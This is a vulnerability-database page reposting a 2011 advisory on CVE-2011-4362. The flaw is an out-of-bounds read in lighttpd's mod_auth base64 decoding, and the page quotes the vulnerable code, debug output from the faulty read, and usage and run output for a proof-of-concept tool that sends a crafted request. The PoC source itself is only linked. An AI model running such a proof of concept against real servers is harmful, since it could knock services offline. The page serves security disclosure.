Lighttpd Proof of Concept code for CVE-2011-4362

🗓️ 02 Jan 2012 00:00:00Reported by RootType

Proof of Concept code for lighttpd CVE-2011-436

Reporter	Title	Published	Views	Family All 52
0day.today	Lighttpd Proof of Concept code for CVE-2011-4362	31 Dec 201100:00	–	zdt
Amazon	Medium: lighttpd	9 Jul 201200:00	–	amazon
Tenable Nessus	Amazon Linux AMI : lighttpd (ALAS-2012-107)	4 Sep 201300:00	–	nessus
Tenable Nessus	Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)	12 Jan 201200:00	–	nessus
Tenable Nessus	Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)	26 Jun 201200:00	–	nessus
Tenable Nessus	Fedora 16 : lighttpd-1.4.31-1.fc16 (2012-9078)	26 Jun 201200:00	–	nessus
Tenable Nessus	FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)	29 Dec 201100:00	–	nessus
Tenable Nessus	GLSA-201406-10 : lighttpd: Multiple vulnerabilities	16 Jun 201400:00	–	nessus
Tenable Nessus	lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS	28 Dec 201100:00	–	nessus
Tenable Nessus	openSUSE Security Update : lighttpd (openSUSE-2012-110)	13 Jun 201400:00	–	nessus


                                                29 of November 2011 was the date of public disclosure interesting
vulnerability in lighttpd server. Xi Wang discovered that mod_auth
for this server does not propely decode characters from the extended
ASCII table. The vulnerable code is below:
 
 
&quot;src/http_auth.c:67&quot;
--- CUT ---
static const short base64_reverse_table[256] = ...;
static unsigned char * base64_decode(buffer *out, const char *in) {
    ...
    int ch, ...;
    size_t i;
    ...
 
        ch = in[i];
        ...
        ch = base64_reverse_table[ch];
    ...
}
--- CUT ---
 
Because variable 'in' is type 'char', characters above 0x80 lead to
negative indices.
This vulnerability may lead out-of-boud read and theoretically cause
Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where .rodata section before
the base64_reverse_table
table cause this situation.
 
I have added some extra debug in the lighttpd source code to see if this
vulnerability is
executed correctly. Here is output for one of the example:
 
--- CUT ---
ptr[0x9a92c48] size[0xc0] used[0x0]
127(. | 0 | 0)
-128(t | 1 | 0)
-127(e | 2 | 1)
-126(' | 3 | 2)
-125(e | 4 | 3)
-124(u | 5 | 3)
-123(r | 6 | 4)
-122(' | 7 | 5)
-121(s | 8 | 6)
-120(c | 9 | 6)
-119(i | 10 | 7)
-118(n | 11 | 8)
-117(i | 12 | 9)
-116(  | 13 | 9)
-115(a | 14 | 10)
-114(t | 15 | 11)
-113(. | 16 | 12)
-112(e | 17 | 12)
-111(u | 18 | 13)
-110(r | 19 | 14)
-109(' | 20 | 15)
-108(f | 21 | 15)
-107(i | 22 | 16)
-106(e | 23 | 17)
-105(: | 24 | 18)
-104(= | 25 | 18)
-103(o | 26 | 19)
-102(t | 27 | 20)
-101(o | 28 | 21)
-100(  | 29 | 21)
-99(a | 30 | 22)
-98(g | 31 | 23)
-97(. | 32 | 24)
-96(d | 33 | 24)
-95(g | 34 | 25)
-94(s | 35 | 26)
-93(: | 36 | 27)
-92(u | 37 | 27)
-91(s | 38 | 28)
-90(p | 39 | 29)
-89(o | 40 | 30)
-88(t | 41 | 30)
-87(d | 42 | 31)
-86(b | 43 | 32)
-85(c | 44 | 33)
-84(e | 45 | 33)
-83(d | 46 | 34)
-82(( | 47 | 35)
-81(n | 48 | 36)
-80(y | 49 | 36)
-79(h | 50 | 37)
-78(d | 51 | 38)
-77(g | 52 | 39)
-76(s | 53 | 39)
-75(  | 54 | 40)
-74(r | 55 | 41)
-73(p | 56 | 42)
-72(a | 57 | 42)
-71(n | 58 | 43)
-70(. | 59 | 44)
-69(. | 60 | 45)
-68(d | 61 | 45)
-67(g | 62 | 46)
-66(s | 63 | 47)
-65(: | 64 | 48)
-64(( | 65 | 48)
-63(d | 66 | 49)
-62(- | 67 | 50)
-61(e | 68 | 51)
-60(s | 69 | 51)
-59(  | 70 | 52)
-58(i | 71 | 53)
-57(s | 72 | 54)
-56(n | 73 | 54)
-55(  | 74 | 55)
-54(i | 75 | 56)
-53(l | 76 | 57)
-52(. | 77 | 57)
-51(. | 78 | 58)
-50(k | 79 | 59)
-49(0 | 80 | 60)
-48(% | 81 | 60)
-47(] | 82 | 61)
-46(p | 83 | 62)
-45(r | 84 | 63)
-44(0 | 85 | 63)
-43(% | 86 | 64)
-42(] | 87 | 65)
-41(s | 88 | 66)
-40(z | 89 | 66)
-39([ | 90 | 67)
-38(x | 91 | 68)
-37(x | 92 | 69)
-36(  | 93 | 69)
-35(s | 94 | 70)
-34(d | 95 | 71)
-33(0 | 96 | 72)
-32(% | 97 | 72)
-31(] | 98 | 73)
-30(. | 99 | 74)
-29(. | 100 | 75)
-28(d | 101 | 75)
-27(c | 102 | 76)
-26(d | 103 | 77)
-25(i | 104 | 78)
-24(g | 105 | 78)
-23(b | 106 | 79)
-22(s | 107 | 80)
-21(6 | 108 | 81)
-20(- | 109 | 81)
-19(t | 110 | 82)
-18(i | 111 | 83)
-17(g | 112 | 84)
-16(f | 113 | 84)
-15(i | 114 | 85)
-14(e | 115 | 86)
-13(. | 116 | 87)
-12(. | 117 | 87)
-11(. | 118 | 88)
-10(. | 119 | 89)
-9(. | 120 | 90)
-8(. | 121 | 90)
-7(. | 122 | 91)
-6(. | 123 | 92)
-5(. | 124 | 93)
-4(. | 125 | 93)
-3(. | 126 | 94)
-2(. | 127 | 95)
-1(. | 128 | 96)
k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
ptr[0x9a92c48] size[0xc0] used[0x60]
string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
--- CUT ---
 
First column is the offset so vulnerability is executed like it should be
(negative offsets). Second column is byte which is read out-of-bound.
 
How to run this very primitive Proof of Concept?
 
$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
$ ./p_cve-2011-4362
 
    ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
]=- :::...
 
    Usage: ./p_cve-2011-4362 &lt;options&gt;
 
        Options:
             -v &lt;victim&gt;
             -p &lt;port&gt;
             -d &lt;remote_dir_for_auth&gt;
 
$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa
 
    ...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
]=- :::...
 
        [+] Preparing arguments... OK
        [+] Creating socket... OK
        [+] Connecting to [127.0.0.1]... OK
        [+] Sending dirty packet... OK
 
        [+] Check the website!
 
$
 
Lighttpd will log this situation probably in error-log file like this:
 
--- CUT ---
..
..
2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in
�Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp� ]߶��\���@V��x���ize
 
--- CUT ---
 
Maybe you can find vulnerable binary?
 
Best regards,
Adam 'pi3' Zabrocki
 
 
--
http://pi3.com.pl
http://www.exploit-db.com/sploits/p_cve-2011-4362.c
http://blog.pi3.com.pl/?p=277

02 Jan 2012 00:00Current

9.6High risk

Vulners AI Score9.6

EPSS0.04391